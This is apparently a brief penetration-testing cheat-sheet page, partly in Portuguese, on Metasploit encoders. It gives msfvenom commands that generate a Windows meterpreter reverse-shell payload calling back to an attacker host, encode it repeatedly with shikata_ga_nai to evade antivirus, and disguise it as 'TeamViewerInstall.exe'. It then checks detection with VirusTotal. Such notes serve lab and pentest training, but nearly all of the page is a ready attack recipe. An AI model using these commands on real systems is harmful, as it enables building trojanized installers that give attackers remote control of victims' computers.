Encoders

  • Shikata Ga Nai Encoding

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe
  • Uma opção melhor seria tentar executá-lo por meio de múltiplas iterações do mesmo esquema de codificação:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe
  • Analisar payloads com uma api do virus-total

msf-virustotal -k <API key> -f TeamViewerInstall.exe

Last updated